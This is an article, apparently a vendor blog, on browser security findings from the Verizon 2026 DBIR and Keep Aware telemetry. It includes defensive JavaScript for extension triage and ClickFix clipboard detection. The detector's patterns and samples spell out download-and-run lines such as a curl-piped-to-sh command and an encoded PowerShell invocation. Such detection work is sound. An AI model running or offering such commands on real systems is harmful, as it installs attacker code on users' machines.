The Browser Blind Spot: Key Takeaways from the Verizon 2026 DBIR and Keep Aware's Insights
The **Verizon Data Breach Investigations Report (DBIR)** for 2026 reveals critical shifts in the threat landscape, with **Keep Aware's** browser telemetry highlighting significant blind spots missed by traditional security tools. This year's findings underscore the browser's emerging role as both a primary attack vector and a crucial point of detection for evolving threats like **Shadow AI**, credential theft, and sophisticated social engineering.

The annual **Verizon Data Breach Investigations Report (DBIR)** serves as a vital benchmark for the cybersecurity industry, offering insights derived from a multitude of independent data sources. This year, the 2026 **DBIR** signals a significant structural shift in attacker methodologies, emphasizing the growing importance of browser-layer visibility.
As a contributor to the 2026 **DBIR**, the **Keep Aware** team gained early insight into these converging signals. Their browser telemetry aligns with the **DBIR** data, further revealing critical areas where traditional network and endpoint tools fall short.
### Shadow AI: A Mainstream Enterprise Risk
**Shadow AI** has emerged as a major concern, identified in the **Verizon DBIR** as the third most common non-malicious insider action observed in Data Loss Prevention (DLP) datasets. This represents a fourfold increase from the previous year. Employees are increasingly using personal AI services like **ChatGPT** to expedite tasks, often pasting internal documents or source code into unauthorized sessions before corporate-approved alternatives are available.
The scale of this unauthorized AI usage is staggering: 67% of users access AI services on corporate devices via personal, non-corporate accounts. Furthermore, 45% of employees are now regular AI users. **Keep Aware's** browser telemetry adds a crucial layer of detail, showing that over half of AI prompt inputs are sent to personal accounts. A significant 23% of sensitive prompt uploads involve data transiting through personal or unverified accounts, effectively bypassing corporate DLP policies and logging infrastructure.

### Credential Abuse and the Browser's Detection Gap
The 2026 **DBIR** found that 39% of breaches involved credential abuse. **Keep Aware's** 2025 attack data corroborates this, identifying browser-based credential theft as the leading browser-based attack, accounting for approximately 41% of observed threat activity. This suggests that credential theft originating in the browser often precedes successful breaches.
A critical finding is the invisibility of these attacks to traditional security tools. **Keep Aware's** analysis revealed that 63% of **Microsoft**-themed phishing sites were not flagged by any **VirusTotal** vendor at the time of employee exposure. More alarmingly, 100% of observed credential theft attempts bypassed existing non-browser security controls, including network proxies, DNS filters, and endpoint agents. Detection, it appears, is reliably possible only within the browser itself, where the page is rendered and user interaction occurs.
### Browser Extensions: Privileged, Ungoverned, and Expanding Threat
Browser extensions operate with a high level of privilege, capable of reading, modifying, and exfiltrating data from within the browser context. Despite this, the 2026 **DBIR** flagged that the average enterprise has over 15% of users with unauthorized AI extensions installed.
The problem extends beyond AI tools. **Keep Aware's** telemetry shows that 13% of unique browser extensions across their customer base were classified as high or critical risk. A particularly concerning insight is that 93% of these poor-reputation extensions were labeled as "productivity" tools by browser marketplaces. This common categorization renders category-based allowlisting policies functionally useless for this threat class.
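
A permission-based review is one alternative to category allowlisting. The following is an added example, not code from Keep Aware or Verizon: it triages an extension inventory by what each manifest requests rather than by its marketplace label. The permission names are real Chrome manifest values; the risk tiers, thresholds and sample inventory are constructed assumptions.

```javascript
// Added example: triage extensions by requested capability, not store category.
// Permission names are real Chrome manifest values; the tiers are assumptions.
const HIGH_RISK_PERMISSIONS = new Set([
  "cookies", "webRequest", "clipboardRead", "scripting",
  "history", "nativeMessaging", "debugger",
]);
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

function assessExtension(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.optional_permissions || [])];
  // Manifest V3 lists hosts in host_permissions; V2 mixes them into permissions.
  // Content-script match patterns also grant access to page content.
  const hosts = [
    ...(manifest.host_permissions || []),
    ...perms,
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  const risky = perms.filter((p) => HIGH_RISK_PERMISSIONS.has(p));
  const allSites = hosts.some((h) => BROAD_HOSTS.has(h));
  let level = "low";
  if (allSites || risky.length > 0) level = "medium";
  if (allSites && risky.length > 0) level = "high";
  return { level, allSites, risky };
}

// Extensions a category allowlist would admit but a permission review rates high.
function missedByCategoryPolicy(inventory, allowedCategories) {
  return inventory
    .filter((ext) => allowedCategories.includes(ext.category))
    .filter((ext) => assessExtension(ext.manifest).level === "high")
    .map((ext) => ext.name);
}

// Constructed sample inventory (names, categories and manifests are invented).
const SAMPLE_INVENTORY = [
  { name: "Tab Notes Helper", category: "productivity",
    manifest: { manifest_version: 3, permissions: ["storage"] } },
  { name: "PDF Quick Convert", category: "productivity",
    manifest: { manifest_version: 3, permissions: ["cookies", "webRequest"],
                host_permissions: ["<all_urls>"] } },
  { name: "Grammar Assistant", category: "productivity",
    manifest: { manifest_version: 3, permissions: ["storage"],
                content_scripts: [{ matches: ["https://*/*"], js: ["c.js"] }] } },
];

console.log(missedByCategoryPolicy(SAMPLE_INVENTORY, ["productivity"]));
```

All three sample extensions carry the same "productivity" label, so only the manifest contents separate them.
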
### ClickFix and Browser-Native Social Engineering
Both the 2026 **DBIR** and **Keep Aware's** State of Browser Security Report highlight **ClickFix** as an emerging social engineering technique. The **Verizon DBIR** noted **ClickFix** accounted for 2.7% of browser-detected attacks, a small but significant indicator of evolving browser-based social engineering.

**ClickFix** is a deceptive tactic designed to trick users into unknowingly executing malicious code from the browser onto their host machine. These attacks often originate from compromised websites or even malicious LLM chat responses. While the endpoint ultimately bears the impact, the browser serves as the initial social engineering medium and, crucially, the first line of defense.
### The Human Element: A Browser-Centric Problem
The 2026 **DBIR** found that 62% of breaches involved the human element, with phishing initiating 16% of incidents. **Keep Aware's** data further emphasizes this, showing phishing and social engineering responsible for 46% of browser attacks in 2025.
While often framed as a training and awareness issue, attackers are constantly refining browser-based social engineering. Tactics include phishing links to benign intermediary sites, complex redirect chains, pages that render differently for automated scanners, content hosted on legitimate websites, and silent clipboard injections. Browser-level visibility doesn't eliminate the human element but shifts detection to the point of interaction, identifying threats before they are exploited downstream.
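
The silent clipboard injection mentioned above, and the ClickFix technique from the previous section, can both be examined at the moment a page writes to the clipboard. The following is an added example, not code from Keep Aware or the DBIR: it scores the written text and compares it with what the user actually selected. It assumes the lure works by placing command text on the clipboard; the patterns, weights and sample events are constructed.

```javascript
// Added example: score text a page places on the clipboard.
// Patterns and weights are illustrative assumptions, not a vendor rule set.
const COMMAND_INDICATORS = [
  { name: "script-host", weight: 2,
    re: /\b(powershell|pwsh|mshta|cmd(\.exe)?\s+\/c|wscript|cscript|rundll32)\b/i },
  { name: "encoded-or-hidden", weight: 2,
    re: /\s-(enc|encodedcommand|w(indowstyle)?\s+hidden)\b/i },
  { name: "download-and-run", weight: 3,
    re: /\b(curl|wget|iwr|invoke-webrequest)\b[^\n]*(\||;|&&)\s*(sh|bash|iex|invoke-expression)\b/i },
  { name: "remote-url", weight: 1, re: /https?:\/\/[^\s'"]+/i },
];

function assessClipboardWrite({ written, selected }) {
  const hits = COMMAND_INDICATORS.filter((i) => i.re.test(written));
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  // Text the user never selected is the silent-injection case.
  const injected = written.trim() !== (selected || "").trim();
  let verdict = "allow";
  if (score >= 3) verdict = injected ? "block" : "warn";
  return { verdict, injected, score, indicators: hits.map((i) => i.name) };
}

// Constructed clipboard events; PLACEHOLDER stands in for an encoded payload.
const SAMPLE_WRITES = [
  { selected: "I am not a robot",
    written: "powershell -NoProfile -EncodedCommand PLACEHOLDER" },
  { selected: "curl -s https://example.invalid/install.sh | sh",
    written: "curl -s https://example.invalid/install.sh | sh" },
  { selected: "Quarterly report draft", written: "Quarterly report draft" },
];

function assessSamples() {
  return SAMPLE_WRITES.map(assessClipboardWrite);
}

console.log(assessSamples().map((r) => r.verdict));
```

In a browser deployment the `selected` and `written` values would come from a content script observing copy events; here they are passed in directly so the logic runs under Node.
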
### Implications for Security Teams
**Shadow AI**, credential theft, malicious extensions, and browser-native social engineering techniques like **ClickFix** share a common thread: they all execute within the browser and produce artifacts that are mostly, if not only, visible at the browser layer.
Security programs relying solely on network, endpoint, and identity telemetry will continue to harbor significant blind spots precisely where attackers are increasingly operating. The browser is no longer merely an application; for most enterprise users, it is the primary work environment. Securing it is no longer an option but a necessity. Understanding this gap is crucial before attackers exploit it.